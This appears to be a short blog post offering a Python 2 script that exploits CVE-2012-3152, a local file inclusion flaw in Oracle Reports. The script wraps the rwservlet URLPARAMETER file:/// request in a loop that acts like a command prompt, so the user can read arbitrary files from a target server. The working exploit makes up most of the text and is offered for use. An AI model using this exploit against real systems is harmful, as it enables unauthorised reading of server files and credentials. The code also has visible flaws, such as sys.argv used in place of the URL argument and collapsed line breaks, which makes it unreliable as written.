This quick snippet of code exploits CVE-2012-3152 Oracle Reports Local File Inclusion (LFI) vulnerability. To more easily interact with the vulnerable system the HTTP request exploiting the LFI is wrapped in an endless loop that feels like a command prompt. Here is a good write-up on the actual vulnerability. For this script we threw in a dash of color to the shell-like ouput using the Python module “termcolor” – Download here.
#!/usr/bin/python import sys, urllib2 # Import the required modules for the vulnerability from termcolor import colored # Need to download python module "termcolor" if len(sys.argv) != 2: # Checks to make sure that a URL was supplied as a sys argument "<script> <URL>" print "Usage: "+sys.argv+" <URL>" sys.exit(0) URL=sys.argv # Assigns URL variable and prints out message print "[+] Attempting CVE-2012-3152 - Oracle Reports LFI" while True: # Endless loop printing out a "~$ " and getting user input via "raw_input" to the command variable resource=raw_input(colored("~$ ", "red")) req = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///'+resource+'"' try: # Sets up a Try/Except loop so exceptions are handled cleanly response=urllib2.urlopen(URL+req) # Sends request and prints the response for line in response.readlines(): print line.strip() except Exception as e: print e